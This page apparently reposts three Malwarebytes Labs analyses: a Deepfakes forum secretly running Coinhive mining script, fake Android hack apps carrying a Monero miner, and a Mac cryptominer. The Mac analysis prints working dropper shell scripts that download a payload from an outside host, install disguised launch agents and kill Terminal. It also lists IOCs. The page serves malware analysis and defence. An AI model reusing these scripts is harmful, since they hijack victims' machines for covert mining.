After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is monetize potentially dubious fakes that you didn’t create yourself and hammer visitor’s PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits:

promo messages

Click to enlarge

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be given the controversial content on offer:

Deep...coins?

Click to enlarge

A quick check of the source code, while your CPU likely ramps up to 100 percent, would tell a slightly different story:

miner code

Click to enlarge

We have some Javascript located at:

/mybbalertsjs(dot)min(dot)js

Click to enlarge

Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

miner function

var Miner=function

…miner…function? Did this site place mining scripts in the background?

coinhive

Click to enlarge

self.CoinHive.CONFIG=

They sure did, and we block both the mining and the website in question.

blocked

Click to enlarge

Coinhive is something we’ve been blocking since October. It allows you to place cryptocurrency mining scripts on your webpage, similar to how regular adverts are placed, except it’ll try to make as much use of your machine as possible to whip up some Monero coins for the site owner. Here’s an example of a site pushing a PC to the limit via mining scripts in the background. Check out the resources being gobbled up on the right-hand side:

Ramping up

Click to enlarge

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech which demands high system specs and also has people simultaneously making content as well as downloading it, they’re prime targets for a spot of potentially surreptitious cryptomining taking place behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 7, 2018
John
Comments Off on Bogus hack apps hack users back for cryptocash

Bogus hack apps hack users back for cryptocash

Recently, we discovered a gold…er…APK mine of fake hacking apps. The “legitimate” versions of hack apps are intended to hack other apps in order to get something for free. Although it’s unclear what exactly these fake apps claim to hack, the real hack job is done to unsuspecting users.

Search and you will find

Disclaimer:  I, and Malwarebytes, do not recommend the process I’m about to outline below. Be that as it may, I’m also not naïve and know people do this all the time. In order to demonstrate the pitfalls of such an approach, I’ll lay it all out for you.

Say you want a hack for a particular app. Obviously, you aren’t going to find such a hack on Google Play. So you fire up your favorite search engine and type in something like hack apk. In this example, let’s use Lyft hack apk—Lyft being, of course, the popular on-demand transportation company. There, right at the top of the results, is the link to the hack app you desire. You decide to play it safe and navigate to the source domain rather than the direct link to the hack app. It’s a clean but simply looking website called androidapk.world.

Convinced that such a clean-looking site has to be legitimate, you proceed to the Lyft hack app.

Click to view slideshow.

Complete with app screenshots, description of the app (stolen from Google Play), a FAQ, and a How to Install section, it looks promising. There is even a long list of tags so it can be easily searched—which is how you navigated there in the first place. You roll the dice and click Download APK…

A bad roll of the dice

After install, you open the app and get a message that states you need to install one of three apps listed to unlock premium content.

Click to view slideshow.

At this point, I suspect that a seasoned user would conclude that the jig is up and rush to uninstall, but let’s just play this out anyway. The first link for Castle Clash redirects you to the legit Google Play version of the game—okay, easy enough.  The second link for Final Fantasy XV redirects to a broken link—fail. The third and final link for AppMatch Survey redirects to a dreaded, but harmless survey that ends in, once again, installing an app from Google Play.

Besides the failed link, all the redirects equal a small payout to the evil doers if an app is installed. Thus the “run it for 30 seconds” disclaimer pop-up.

After installing said app, and still no hack app and/or premium content, you should be ready to uninstall this bogus hack job. Good luck finding the app’s shortcut icon though, because it doesn’t exist. Luckily, it’s not too hard to find in your apps list.

In reality, I’m a little disappointed and confused that the malware developers didn’t hide their efforts more thoroughly. But hey, it’s good news if you did unsuspectingly install it. Hopefully if you did install, you go through the steps to uninstall in leu of the missing shortcut. However, there is going to be small percentage that don’t bother and forget about its existence—which is exactly what the bad actors are “banking” on. (Pun intended. Wait for it…)

Oh, mine!

So far, the attempts to dupe users seem bush league. Meanwhile, the true malicious intent has been running in the background all along. During the entire process of clicking through redirect links, the user may notice their mobile device being a tad slow. That’s because a bitcoin miner has been running the whole time. Under the Java class com.coinhiveminer.CoinHive is a Monero JavaScript miner. Thus, we classify this bogus hack app as Android/Trojan.CoinMiner.kki.

Just a dish of adware

As if things couldn’t get worse, this fake hack app also comes with adware. Not surprising, as we are seeing a trend of adware being added to various malware variants as way to gain extra revenue. This particular adware serves ad pop-ups, as seen below.

Snake eyes

At the beginning of this blog post, I mentioned that I was not naïve to the fact that people willingly install hack apps. I ask you, dear readers, to not be naïve as well. Trying to find workarounds to get apps for free that are otherwise paid apps on Google Play is a gamble. The odds are against you by going to third-party app stores to install apps for free, or finding hack apps like the one described above.  This roll of the dice ends in snake eyes.

In the scenario above, I’m not sure how anything is being hacked from the aforementioned Lyft Hack app. As a matter of fact, this should be the first clue something is fishy. As with anything in life, use your best judgment when installing apps onto your mobile device. Consequently, installing an app from a shady app store, even if it does look legit, could cost you. Stay safe out there!

The post Bogus hack apps hack users back for cryptocash appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 7, 2018
John
Comments Off on New Mac cryptominer has 23 older variants

New Mac cryptominer has 23 older variants

On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website. Since then, we’ve been doing some digging and found that this isolated incident was just the tip of the iceberg. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year.

As we usually do when looking into new malware, we did some searches through the website VirusTotal—a massive crowd-sourced malware repository —to see if we could find any other variants. These searches, called “retrohunts,” don’t always turn up much, but in this case we struck gold, finding no less than 23 older variants of this malware!

The oldest of these was a file named “niceass.zip” (nice name). Decompressing the file resulted in a folder with two files: an image file called “ass.jpg” and an apparently broken application named “temp.”

As indicated by the Finder, the “temp” application does not work at all, and on inspection, it didn’t even have the right internal structure to be a macOS app.

However, the contents are nonetheless intriguing. They are:

  • an “ass.jpg” image (which you’re really better off not seeing)
  • a file named “com.zerowidth.launched.apple.plist” which is a launch agent .plist file
  • an executable named “Dock” (the same name as the Apple process that manages the Dock)
  • a Frameworks folder containing some external framework code that must be needed by the Dock executable

Clearly, this isn’t an app, but some kind of naughtiness is planned.

What about the first ass.jpg file, located outside the temp.app bundle? In what I bet is not at all surprising to anyone, it turns out it’s not actually a JPEG file. Instead, it’s a shell script.

nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp
mv ~/Downloads/niceass/.tmp/Apple ~/Library &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/Apple/com.zerowidth.launched.apple.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.apple.plist &&
rm -rf ~/Downloads/niceass/.tmp &&
rm ~/Downloads/niceass/ass.jpg &&
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &&
open -a Preview ~/Downloads/niceass/ass.jpg &&
~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr &
killall Terminal

As we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. If it’s anywhere else, or if you removed the broken temp.app, the malware will fail completely.

The first step is to rename temp.app to “.tmp”, which hides it from view thanks to the initial period in the name. (I’m not sure why it wasn’t distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations. The launch agent .plist file is installed and loaded.

Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn’t just an image file.

Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate. Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency. Hold on tight as your MacBook Pro’s fans attempt to propel it into flight!

The interesting thing is how the ass.jpg runs. We’ve covered a number of tricks used by malware in the past to make a shell script look like another type of file, such as a space at the end to prevent the extension from actually being treated as an extension or the use of special non-ASCII lookalike characters in the extension. In this case, though, that’s an honest-to-goodness .jpg extension.

There’s actually a simple way to override this extension. Using the Get Info window (File -> Get Info in the Finder), you can change the application used to open a particular file.

Doing so saves this setting in special metadata associated with the file. If the file is then compressed into a zip file using a Mac, that metadata will be preserved in some special files added to the zip file, and it will be reconstructed on another Mac when decompressed. This metadata can be viewed from the command line using the “xattr -l” command.

$ xattr -l /Users/thomas/Desktop/link-to-download.txt 
com.apple.LaunchServices.OpenWith:
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 6D |...m|

All in all, this is not a highly sophisticated piece of malware. There are many points of failure and things that will cause suspicion, and these could have all been avoided easily. But hey, this is just the earliest variant. We’ve still got 22 others to look at!

It turns out that none of the other niceass variants are any more sophisticated. Chronologically, the next variant is called “serial.zip”, and it works similarly, except that the suspicious temp.app has been renamed .temp.app, hiding it from the user’s view. It replaces the nasty photo with a text file containing a serial number of some kind. Otherwise, it is mostly identical, even down to the same damaged email address passed to the miner.

Next came a long string of files claiming to be JPEGs taken from WhatsApp, having names like “WhatsApp Image 2017-12-23 at 13.31.15.jpeg.” These didn’t rely on the temp.app, instead downloading the payload from public.adobecc.com as we saw with the MacUpdate variants, and grabbing a decoy image from www.askideas.com.

nohup rm -rf ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg &&
curl -o ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg https://www.askideas.com/media/38/I-Killed-Black-Snake-Why-U-Not-Happy-Funny-Pet-Meme-Image-For-Whatsapp.jpg &&
open -a Preview ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg &&
curl -o ~/Library/1.zip https://public.adobecc.com/files/1UFRTMCE4GD4DBFSPQVFGD2FYYVFFF?content_disposition=attachment &&
cd ~/Library &&
unzip ~/Library/1.zip &&
rm -rf ~/Library/1.zip &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist &
killall Terminal

This variant also employs the MacOSupdate.plist and MacOS.plist launch agents as seen with the MacUpdate variants of the malware. These WhatsApp variants are dated between December 23 and January 26 (judging by the file metadata, not the filename).

The final variant, dated December 26, was a single file named link-to-download.txt, which had similarities with both the WhatsApp and serial/niceass variants.

Interestingly, these files are all cryptographically signed using two different Apple developer certificates. These certificates were issued to people named (or claiming to be named) Ramos Jaxson and Tiago Mateus. (Mr. Jaxson was also responsible for the signatures on the more recent MacUpdate variants.)

In an interesting development, reported first by Arnaud Abbati of SentinelOne, the hidden .DS_Store metadata file inside the more recent MacUpdate variants revealed Mr. Mateus’ full name to be Tiago Brandao Mateus.

This is a pretty specific name, but it remains to be seen whether this is his real name or if it’s a decoy. Since this malware is not terribly sophisticated, with some pretty dumb mistakes being made with it, my suspicion is that the hacker who created it had no idea that the .DS_Store file existed, much less that it would capture the username he was using on his computer.

Hopefully, the authorities can track down Mr. Mateus and suss out any involvement he may have had in the creation of this malware.

IOCs

Dropped files

~/Library/LaunchAgents/com.zerowidth.launched.apple.plist
~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist
~/Library/LaunchAgents/MacOS.plist
~/Library/LaunchAgents/MacOSupdate.plist
~/Library/Apple/Dock
~/Library/mdworker/mdworker

Hashes

3ec55908c3357b92a58f877440d110a970d4ce4cc76a8ac1a7281abec71c717f
d58dd1f057da70a28a67ef48fe4c3942f99ffa082dd7d79c139db7f86e8ac63c
b30ef172e01a31c687e311334677241c2b338844a6bc92bfe06bb5f359281dfa
47667ab1c5950b77ed50a7e629dd916db7505bcb9abff6e21dd7edaa280cc043
6b8d88f08569c4ff778647bede9dbb329dad628474422f86cec2ba0c3084072a
a6f454b71a4d4f1c9767197f5459363f77fb205ef274a189e4e0aefa825b19f9
ac8f29c762e27d5c6ccb73c016cd05f79123bcf5420e9f7547839243c39d6a4c
dd3731d421901f17f213ffd0a38596e12f413d43100be9754879247f51c75397
f23ec1d8de76824838b2ac2782ac97819f94c3a5695e2be83357f5a6e0d12d8c
2527ff0b11fd312c7aa7fc39f19c08298f2a0e17c171f96f83e8a32c4979c878
3dc8fdfb09f38f6ca1ae0360660a9b71e3be58b1ea72655fa07fcc0ed8633e29
eff259d20b01d96b6ae9c05106e6462f5e0dd8ae6dc548f5b9d87444b45988d0
cfa7a04e4958acf89baa0dd2ce2a8b9618fd500f7ed6fffd4cf7703c9bbde188
28219506e683f4324815bcfb4fb9115abfdc611ad49f00d1382ff005f8b10103
cc058cc8821ed92e0c8385a36b4aae589e7383a05eba764195f311c046a519fd
592ba3b270c5f46c2912e64d855f2ff918af4b9708845b5239b83e949d670ba9
a1cdbd2a03bb84f001034ecaed52e45147213e487b2b83df94da42893a2b725f
783ffb8b21e8df463c8f024d4e085aae345ee5784db62c7209f07f30a0fda399
e59c8db1a48b08d03e0c64b9259c11154e267662d5d1183b8dc6837afc33006a
17ff20345c9579ee1f5f51cb5c36806e238536b18db112a99a15b9e0ff190acf
1fc064e7d6624d1539469dc038709fffb7aabc6b484446d7d9dd87507680155f
83f40501e7f27b2b3aa0590b63985b9af99e05dd71f333b2b2d430bd9b4335df
f75b21f758b698822518eee358c8b57e9f5421d691d5a9d6fbe395a974c57c3e

The post New Mac cryptominer has 23 older variants appeared first on Malwarebytes Labs.

Powered by WPeMatico

Pages:1234567...16»

Location and hours

1-401-366-2249
Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo